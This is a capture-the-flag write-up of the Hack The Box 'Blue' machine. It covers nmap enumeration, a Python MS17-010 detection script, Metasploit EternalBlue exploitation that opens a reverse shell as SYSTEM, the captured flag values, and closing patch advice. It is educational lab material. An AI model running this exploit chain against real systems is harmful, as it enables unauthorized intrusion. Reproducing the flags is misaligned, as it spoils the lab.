__    _____        _____     _____ _ _____
        |  |  |  _  |   ___|  _  |___|  |  |_|_   _|___
        |  |__|     |  |  _|     |_ -|     | | | | | .'| 
        |_____|__|__|  |___|__|__|___|__|__|_| |_| |__,|
			hola@lacashita.com

 
 

[HTB] Blue

Today we are going to hack the HTB machine called Blue. It is rated as easy.
  • Enumeration
  • sml@m0nikE:~/ctf/htb/machines/blue$ nmap -A -p- 10.10.10.40
    Starting Nmap 7.80 ( https://nmap.org ) at 2019-11-24 17:12 CET
    Nmap scan report for 10.10.10.40
    Host is up (0.036s latency).
    Not shown: 65526 closed ports
    PORT      STATE SERVICE      VERSION
    135/tcp   open  msrpc        Microsoft Windows RPC
    139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
    445/tcp   open  microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
    49152/tcp open  msrpc        Microsoft Windows RPC
    49153/tcp open  msrpc        Microsoft Windows RPC
    49154/tcp open  msrpc        Microsoft Windows RPC
    49155/tcp open  msrpc        Microsoft Windows RPC
    49156/tcp open  msrpc        Microsoft Windows RPC
    49157/tcp open  msrpc        Microsoft Windows RPC
    Service Info: Host: HARIS-PC; OS: Windows; CPE: cpe:/o:microsoft:windows

    Host script results:
    |_clock-skew: mean: -4s, deviation: 1s, median: -5s
    | smb-os-discovery:
    |   OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
    |   OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
    |   Computer name: haris-PC
    |   NetBIOS computer name: HARIS-PC\x00
    |   Workgroup: WORKGROUP\x00
    |_  System time: 2019-11-24T16:16:13+00:00
    | smb-security-mode:
    |   account_used: guest
    |   authentication_level: user
    |   challenge_response: supported
    |_  message_signing: disabled (dangerous, but default)
    | smb2-security-mode:
    |   2.02:
    |_    Message signing enabled but not required
    | smb2-time:
    |   date: 2019-11-24T16:16:15
    |_  start_date: 2019-11-24T16:11:25

    Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
    Nmap done: 1 IP address (1 host up) scanned in 265.92 seconds
    Only SMB (139/445) and RPC are exposed, and the host identifies itself as Windows 7 SP1 (build 7601) with SMB signing disabled and guest access allowed. Let's dig deeper into port 445 with nmap's SMB vulnerability scripts. Quote the glob (--script 'smb-vuln*') so the shell does not expand it against files in the current directory.
    sml@m0nikE:/home/sml$ sudo nmap -sS --script smb-vuln* -p445 10.10.10.40
    Starting Nmap 7.80 ( https://nmap.org ) at 2019-11-24 17:14 CET
    Nmap scan report for 10.10.10.40
    Host is up (0.036s latency).

    PORT    STATE SERVICE
    445/tcp open  microsoft-ds

    Host script results:
    |_smb-vuln-ms10-054: false
    |_smb-vuln-ms10-061: NT_STATUS_OBJECT_NAME_NOT_FOUND
    | smb-vuln-ms17-010:
    |   VULNERABLE:
    |   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
    |     State: VULNERABLE
    |     IDs:  CVE:CVE-2017-0143
    |     Risk factor: HIGH
    |       A critical remote code execution vulnerability exists in Microsoft SMBv1
    |        servers (ms17-010).
    |
    |     Disclosure date: 2017-03-14
    |     References:
    |       https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
    |       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
    |_      https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/

    Nmap done: 1 IP address (1 host up) scanned in 13.12 seconds
    The nmap output reports the host as vulnerable to MS17-010, the remote code execution flaw in Microsoft's SMBv1 server (CVE-2017-0143, the bug behind EternalBlue and WannaCry). The script does not exploit anything: it opens a null session to IPC$ and sends a PeekNamedPipe transaction on an invalid file handle, and an unpatched server replies with STATUS_INSUFF_SERVER_RESOURCES instead of the expected handle error. The other two scripts (ms10-054, ms10-061) came back negative. So let's start metasploit to take advantage of the vulnerability.
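    The check nmap performed above can be reproduced with a short raw-socket script. This is an added example, not code from the original writeup or from nmap: it follows the same probe as smb-vuln-ms17-010 (SMBv1 negotiate, anonymous session setup, tree connect to IPC$, then a TRANS PeekNamedPipe on FID 0) and classifies the NT status in the reply. The PID/MID values, the "Windows 2000" native OS strings, and the two sample replies at the bottom are constructed for the example; only check_host() touches the network.

```python
"""Raw-socket MS17-010 (CVE-2017-0143) check, following nmap's smb-vuln-ms17-010.

Probe: SMBv1 negotiate -> anonymous SessionSetupAndX -> TreeConnectAndX to IPC$
-> SMB_COM_TRANSACTION carrying a PeekNamedPipe on the bogus FID 0.
Unpatched hosts answer STATUS_INSUFF_SERVER_RESOURCES (0xC0000205); patched
hosts answer STATUS_INVALID_HANDLE or STATUS_ACCESS_DENIED.
"""
import socket
import struct

SMB_COM_TRANSACTION = 0x25
SMB_COM_NEGOTIATE = 0x72
SMB_COM_SESSION_SETUP_ANDX = 0x73
SMB_COM_TREE_CONNECT_ANDX = 0x75

STATUS_INSUFF_SERVER_RESOURCES = 0xC0000205  # unpatched SMBv1 server
STATUS_INVALID_HANDLE = 0xC0000008           # patched
STATUS_ACCESS_DENIED = 0xC0000022            # patched

HEADER_FMT = "<4sBIBHH8sHHHHH"  # 32-byte SMBv1 header


def smb_header(command, status=0, tid=0, pid=0x4B2F, uid=0, mid=0x5EC5, flags2=0x2801):
    """SMBv1 header; flags 0x18 = canonicalised paths + case-insensitive names.
    pid/mid are arbitrary client-chosen values (assumed for this example)."""
    return struct.pack(HEADER_FMT, b"\xffSMB", command, status, 0x18, flags2,
                       0, b"\x00" * 8, 0, tid, pid, uid, mid)


def netbios(smb):
    """NetBIOS session service framing: message type 0 + 3-byte big-endian length."""
    return b"\x00" + len(smb).to_bytes(3, "big") + smb


def negotiate_request():
    dialects = b"".join(b"\x02" + d + b"\x00" for d in
                        (b"LANMAN1.0", b"LM1.2X002", b"NT LANMAN 1.0", b"NT LM 0.12"))
    return netbios(smb_header(SMB_COM_NEGOTIATE)
                   + b"\x00" + struct.pack("<H", len(dialects)) + dialects)


def session_setup_request():
    """Null session: both password lengths 0, empty account, domain '.'.
    Capabilities 0x40 (CAP_STATUS32) makes the server return NT status codes."""
    data = b"\x00" + b".\x00" + b"Windows 2000 2195\x00" + b"Windows 2000 5.0\x00"
    words = struct.pack("<BBBHHHHIHHIIH", 13, 0xFF, 0, 0, 0xFFDF, 2, 1, 0,
                        0, 0, 0, 0x40, len(data))
    return netbios(smb_header(SMB_COM_SESSION_SETUP_ANDX, flags2=0x2001) + words + data)


def tree_connect_request(host, uid):
    data = b"\x00" + ("\\\\%s\\IPC$" % host).encode() + b"\x00" + b"?????\x00"
    words = struct.pack("<BBBHHHH", 4, 0xFF, 0, 0, 0, 1, len(data))
    return netbios(smb_header(SMB_COM_TREE_CONNECT_ANDX, uid=uid, flags2=0x2001) + words + data)


def peek_named_pipe_request(tid, uid):
    """SMB_COM_TRANSACTION, Setup = [PeekNamedPipe 0x23, FID 0]. The invalid FID
    is what makes patched and unpatched servers answer with different statuses."""
    words = struct.pack("<BHHHHBBHIHHHHHBBHH", 16, 0, 0, 0xFFFF, 0xFFFF, 0, 0, 0,
                        0, 0, 0, 0x4A, 0, 0x4A, 2, 0, 0x23, 0)
    data = struct.pack("<H", 7) + b"\\PIPE\\\x00"
    return netbios(smb_header(SMB_COM_TRANSACTION, tid=tid, uid=uid) + words + data)


def parse_smb_response(packet):
    """Pull command, NT status, TID and UID out of a NetBIOS-framed SMBv1 reply."""
    if len(packet) < 36 or packet[4:8] != b"\xffSMB":
        raise ValueError("not an SMBv1 reply")
    fields = struct.unpack(HEADER_FMT, packet[4:36])
    return {"command": fields[1], "status": fields[2], "tid": fields[8], "uid": fields[10]}


def classify(status):
    if status == STATUS_INSUFF_SERVER_RESOURCES:
        return "VULNERABLE"
    if status in (STATUS_INVALID_HANDLE, STATUS_ACCESS_DENIED):
        return "PATCHED"
    return "UNKNOWN"


def check_host(host, port=445, timeout=5):
    """Run the four-step probe against a live host; returns (verdict, nt_status)."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        def xchg(req):
            s.sendall(req)
            return parse_smb_response(s.recv(4096))
        xchg(negotiate_request())
        uid = xchg(session_setup_request())["uid"]
        tid = xchg(tree_connect_request(host, uid))["tid"]
        status = xchg(peek_named_pipe_request(tid, uid))["status"]
    return classify(status), status


# Constructed sample replies (not captured from a real host) so the parsing
# path can be exercised offline: the same TRANS reply with each NT status.
SAMPLE_VULNERABLE_REPLY = netbios(smb_header(
    SMB_COM_TRANSACTION, status=STATUS_INSUFF_SERVER_RESOURCES, tid=0x800, uid=0x801))
SAMPLE_PATCHED_REPLY = netbios(smb_header(
    SMB_COM_TRANSACTION, status=STATUS_INVALID_HANDLE, tid=0x800, uid=0x801))

if __name__ == "__main__":
    import sys
    verdict, status = check_host(sys.argv[1])
    print("%s: %s (NT status 0x%08X)" % (sys.argv[1], verdict, status))
```

    Run it as python3 ms17_010_check.py 10.10.10.40; a VULNERABLE verdict is the same signal the nmap script reported above. Because the probe is a single PeekNamedPipe on a bogus handle, it is safe to run against production hosts, unlike the exploit itself.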
  • Exploitation
  • We search metasploit for ms17-010 modules, select exploit/windows/smb/ms17_010_eternalblue and point it at the target. Note that the module is ranked "average": it corrupts the kernel non-paged pool, so a failed attempt can blue-screen the box. On a real engagement prefer ms17_010_psexec (rank "normal") when a writable named pipe is reachable, and keep the scanner module auxiliary/scanner/smb/smb_ms17_010 for a non-destructive check.
    msf5 > search ms17-010

    Matching Modules
    ================

       #  Name                                           Disclosure Date  Rank     Check  Description
       -  ----                                           ---------------  ----     -----  -----------
       0  auxiliary/admin/smb/ms17_010_command           2017-03-14       normal   Yes    MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
       1  auxiliary/scanner/smb/smb_ms17_010                              normal   Yes    MS17-010 SMB RCE Detection
       2  exploit/windows/smb/doublepulsar_rce           2017-04-14       great    Yes    DOUBLEPULSAR Payload Execution and Neutralization
       3  exploit/windows/smb/ms17_010_eternalblue       2017-03-14       average  Yes    MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
       4  exploit/windows/smb/ms17_010_eternalblue_win8  2017-03-14       average  No     MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+
       5  exploit/windows/smb/ms17_010_psexec            2017-03-14       normal   Yes    MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution

    msf5 > use exploit/windows/smb/ms17_010_eternalblue
    msf5 exploit(windows/smb/ms17_010_eternalblue) > show options

    Module options (exploit/windows/smb/ms17_010_eternalblue):

       Name           Current Setting  Required  Description
       ----           ---------------  --------  -----------
       RHOSTS                          yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:'
       RPORT          445              yes       The target port (TCP)
       SMBDomain      .                no        (Optional) The Windows domain to use for authentication
       SMBPass                         no        (Optional) The password for the specified username
       SMBUser                         no        (Optional) The username to authenticate as
       VERIFY_ARCH    true             yes       Check if remote architecture matches exploit Target.
       VERIFY_TARGET  true             yes       Check if remote OS matches exploit Target.

    Exploit target:

       Id  Name
       --  ----
       0   Windows 7 and Server 2008 R2 (x64) All Service Packs

    msf5 exploit(windows/smb/ms17_010_eternalblue) > set rhosts 10.10.10.40
    rhosts => 10.10.10.40
    msf5 exploit(windows/smb/ms17_010_eternalblue) > exploit

    [*] Started reverse TCP handler on 10.10.14.13:4444
    [+] 10.10.10.40:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
    [*] 10.10.10.40:445 - Connecting to target for exploitation.
    [+] 10.10.10.40:445 - Connection established for exploitation.
    [+] 10.10.10.40:445 - Target OS selected valid for OS indicated by SMB reply
    [*] 10.10.10.40:445 - CORE raw buffer dump (42 bytes)
    [*] 10.10.10.40:445 - 0x00000000  57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73  Windows 7 Profes
    [*] 10.10.10.40:445 - 0x00000010  73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76  sional 7601 Serv
    [*] 10.10.10.40:445 - 0x00000020  69 63 65 20 50 61 63 6b 20 31                    ice Pack 1
    [+] 10.10.10.40:445 - Target arch selected valid for arch indicated by DCE/RPC reply
    [*] 10.10.10.40:445 - Trying exploit with 12 Groom Allocations.
    [*] 10.10.10.40:445 - Sending all but last fragment of exploit packet
    [*] 10.10.10.40:445 - Starting non-paged pool grooming
    [+] 10.10.10.40:445 - Sending SMBv2 buffers
    [+] 10.10.10.40:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
    [*] 10.10.10.40:445 - Sending final SMBv2 buffers.
    [*] 10.10.10.40:445 - Sending last fragment of exploit packet!
    [*] 10.10.10.40:445 - Receiving response from exploit packet
    [+] 10.10.10.40:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
    [*] 10.10.10.40:445 - Sending egg to corrupted connection.
    [*] 10.10.10.40:445 - Triggering free of corrupted buffer.
    [*] Command shell session 1 opened (10.10.14.13:4444 -> 10.10.10.40:49158) at 2019-11-24 17:16:37 +0100
    [+] 10.10.10.40:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
    [+] 10.10.10.40:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
    [+] 10.10.10.40:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
    The session opens and we are in. Note that this is a plain reverse TCP command shell (the module's default payload here, not Meterpreter), so everything travels in cleartext over 10.10.14.13:4444.
    C:\Windows\system32>whoami
    whoami
    nt authority\system
    whoami shows that we are NT AUTHORITY\SYSTEM. EternalBlue corrupts the kernel pool and the payload runs from kernel context, so the shell lands as SYSTEM directly and no privilege escalation step is needed: both flags can be read straight away.
  • user.txt
  • C:\>dir
    dir
     Volume in drive C has no label.
     Volume Serial Number is A0EF-1911

     Directory of C:\

    14/07/2009  03:20    <DIR>          PerfLogs
    24/12/2017  02:23    <DIR>          Program Files
    14/07/2017  16:58    <DIR>          Program Files (x86)
    14/07/2017  13:48    <DIR>          Share
    21/07/2017  06:56    <DIR>          Users
    16/07/2017  20:21    <DIR>          Windows
                   0 File(s)              0 bytes
                   6 Dir(s)  15,365,468,160 bytes free

    C:\>cd users
    cd users

    C:\Users>dir
    dir
     Volume in drive C has no label.
     Volume Serial Number is A0EF-1911

     Directory of C:\Users

    21/07/2017  06:56    <DIR>          .
    21/07/2017  06:56    <DIR>          ..
    21/07/2017  06:56    <DIR>          Administrator
    14/07/2017  13:45    <DIR>          haris
    12/04/2011  07:51    <DIR>          Public
                   0 File(s)              0 bytes
                   5 Dir(s)  15,365,468,160 bytes free

    C:\Users>cd haris
    cd haris

    C:\Users\haris>dir
    dir
     Volume in drive C has no label.
     Volume Serial Number is A0EF-1911

     Directory of C:\Users\haris

    14/07/2017  13:45    <DIR>          .
    14/07/2017  13:45    <DIR>          ..
    15/07/2017  07:58    <DIR>          Contacts
    24/12/2017  02:23    <DIR>          Desktop
    15/07/2017  07:58    <DIR>          Documents
    15/07/2017  07:58    <DIR>          Downloads
    15/07/2017  07:58    <DIR>          Favorites
    15/07/2017  07:58    <DIR>          Links
    15/07/2017  07:58    <DIR>          Music
    15/07/2017  07:58    <DIR>          Pictures
    15/07/2017  07:58    <DIR>          Saved Games
    15/07/2017  07:58    <DIR>          Searches
    15/07/2017  07:58    <DIR>          Videos
                   0 File(s)              0 bytes
                  13 Dir(s)  15,365,468,160 bytes free

    C:\Users\haris>cd Desktop
    cd Desktop

    C:\Users\haris\Desktop>dir
    dir
     Volume in drive C has no label.
     Volume Serial Number is A0EF-1911

     Directory of C:\Users\haris\Desktop

    24/12/2017  02:23    <DIR>          .
    24/12/2017  02:23    <DIR>          ..
    21/07/2017  06:54                32 user.txt
                   1 File(s)             32 bytes
                   2 Dir(s)  15,365,455,872 bytes free

    C:\Users\haris\Desktop>type user.txt
    type user.txt
    4c546aea7dbee75cbd71de245c8deea9
  • root.txt
  • C:\Users>dir
    dir
     Volume in drive C has no label.
     Volume Serial Number is A0EF-1911

     Directory of C:\Users

    21/07/2017  06:56    <DIR>          .
    21/07/2017  06:56    <DIR>          ..
    21/07/2017  06:56    <DIR>          Administrator
    14/07/2017  13:45    <DIR>          haris
    12/04/2011  07:51    <DIR>          Public
                   0 File(s)              0 bytes
                   5 Dir(s)  15,365,468,160 bytes free

    C:\Users>cd Administrator
    cd Administrator

    C:\Users\Administrator>cd Desktop
    cd Desktop

    C:\Users\Administrator\Desktop>dir
    dir
     Volume in drive C has no label.
     Volume Serial Number is A0EF-1911

     Directory of C:\Users\Administrator\Desktop

    24/12/2017  02:22    <DIR>          .
    24/12/2017  02:22    <DIR>          ..
    21/07/2017  06:57                32 root.txt
                   1 File(s)             32 bytes
                   2 Dir(s)  15,365,468,160 bytes free

    C:\Users\Administrator\Desktop>type root.txt
    type root.txt
    ff548eb71e920ff6c08843ce9df4e717
  • End
  • With this we have full control of the machine. On the defensive side the whole chain collapses at the first step: apply the MS17-010 update referenced in the nmap output, disable SMBv1 where it is not needed, and do not expose 445 to untrusted networks. Enabling SMB signing, which the first scan flagged as "disabled (dangerous, but default)", is worth doing at the same time even though it is unrelated to this bug.